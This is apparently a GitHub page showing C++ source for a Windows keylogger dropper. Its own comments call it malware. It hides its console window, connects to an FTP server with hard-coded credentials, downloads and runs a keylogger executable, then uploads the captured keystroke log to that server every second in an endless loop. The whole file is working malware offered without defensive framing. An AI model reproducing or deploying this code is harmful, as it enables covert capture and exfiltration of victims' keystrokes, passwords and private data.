Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
182 lines (168 sloc) 4.37 KB
#include <Windows.h>
#include <Wininet.h>
#include <time.h>
#include <cstdlib>
#include <iostream>
#include <string>
#include <fstream>
#pragma comment(lib, "wininet.lib")
#pragma comment(lib, "user32.lib")
using namespace std;
bool verb = true; // Verbouse mode
ofstream err_log("RandomFile");
LPCTSTR log_results = "SameNameAsAbove";
LPCTSTR ftp = "ftp.randomWeb.com";
LPCTSTR ftp_user = "randomuserName";
LPCTSTR ftp_pass = "randomPassword";
LPCTSTR remoteFile = "FileNameOnMaster";
LPCTSTR newFile = "FileNameOnSlave";
LPCTSTR logfile = "KeyloggerTextFile";
bool GetKeylogger()
{
DWORD error = 0;
// Initialization for WinInet Functions
// Optional proxy info is left out
HINTERNET hInternet = InternetOpen(NULL,
INTERNET_OPEN_TYPE_DIRECT,
NULL,
NULL,
0);
// Starts a session in this case an FTP session
HINTERNET hFtpSession = InternetConnect(hInternet,
ftp,
INTERNET_DEFAULT_FTP_PORT,
ftp_user, ftp_pass,
INTERNET_SERVICE_FTP,
INTERNET_FLAG_PASSIVE,
NULL);
/* Initiate access to a remote FTP connection */
HINTERNET hTransfer = FtpOpenFile(hFtpSession,
remoteFile,
GENERIC_READ,
FTP_TRANSFER_TYPE_BINARY,
0);
if (hTransfer)
{
// Perform a data transfer
ofstream out(newFile, std::ios::binary);
if (out.is_open())
{
static const DWORD SIZE = 1024;
BYTE data[SIZE];
DWORD size = 0;
do
{
BOOL result = InternetReadFile(hTransfer, data, SIZE, &size);
if (result == FALSE)
{
error = GetLastError();
err_log << "InternetReadFile error: " << error << endl;
}
out.write((const char*)data, size);
} while ((error == ERROR_SUCCESS) && (size > 0));
out.close();
}
else
{
// Failed to transfer the file
err_log << "Could not open " << newFile;
error = ERROR_FILE_NOT_FOUND;
}
// Close the FTP Handle
const BOOL result = InternetCloseHandle(hTransfer);
if (result == FALSE)
{
const DWORD error = GetLastError();
err_log << "InternetClose error: " << error << endl;
}
/* Check error status of the process */
return (error == ERROR_SUCCESS);
}
DWORD dwInetError, dwExtLength = 1000;
TCHAR *szExtErrMsg = NULL, errmsg[1000];
szExtErrMsg = errmsg;
int returned = InternetGetLastResponseInfo(&dwInetError, szExtErrMsg, &dwExtLength);
err_log << "dwInetError: " << dwInetError << "\nReturned: " << returned << endl;
err_log << "Buffer: " << szExtErrMsg << endl;
err_log << "FtpGetFileError" << endl;
return false;
}
bool PutResults(LPCTSTR newLog, LPCTSTR log_results)
{
DWORD error = 0;
// Initialization for WinInet Functions
// Optional proxy info is left out
HINTERNET hInternet = InternetOpen(NULL,
INTERNET_OPEN_TYPE_PRECONFIG,
NULL,
NULL,
0);
// Starts a session in this case an FTP session
HINTERNET hFtpSession = InternetConnect(hInternet,
ftp,
INTERNET_DEFAULT_FTP_PORT,
ftp_user, ftp_pass,
INTERNET_SERVICE_FTP,
NULL,
NULL);
/* Initiate access to a remote FTP connection */
if(FtpPutFile(hFtpSession,
log_results,
newLog,
FTP_TRANSFER_TYPE_ASCII,
0))
{
err_log << "File copied." << endl;
}
else
{
err_log << "File not copied." << endl;
DWORD dwInetError;
DWORD dwExtLength = 1000;
TCHAR *szExtErrMsg = NULL;
TCHAR errmsg[1000];
szExtErrMsg = errmsg;
int returned = InternetGetLastResponseInfo(&dwInetError, szExtErrMsg, &dwExtLength);
err_log << "dwInetError: " << dwInetError << "\nReturned: " << returned << endl;
err_log << "Buffer: " << szExtErrMsg << endl;
err_log << "FtpGetFileError" << endl;
}
InternetCloseHandle(hInternet);
InternetCloseHandle(hFtpSession);
return false;
}
int main()
{
// Put the malware in stealth mode.
HWND stealth;
AllocConsole();
stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(stealth, 0);
// Start logs
time_t result = time(0);
char str[26];
ctime_s(str, sizeof str, &result);
if(verb) err_log << "Started logging: " << str << endl;
// Download malware
if (verb) err_log << "Downloading Keylogger.exe with FTP." << endl;
bool success = GetKeylogger();
// Execute malware
if (success)
{
if (verb) err_log << "Executing Keylogger.exe" << endl;
system("Keylogger.exe");
}
int n = 0;
while (++n)
{
if (verb) err_log << "Sending logfile #" << n << "." << endl;
ctime_s(str, sizeof str, &result);
PutResults(str, logfile);
Sleep(1000);
}
if (verb) err_log << "Finished." << endl;
Sleep(1000);
ctime_s(str, sizeof str, &result);
PutResults(str, log_results);
return 0;
}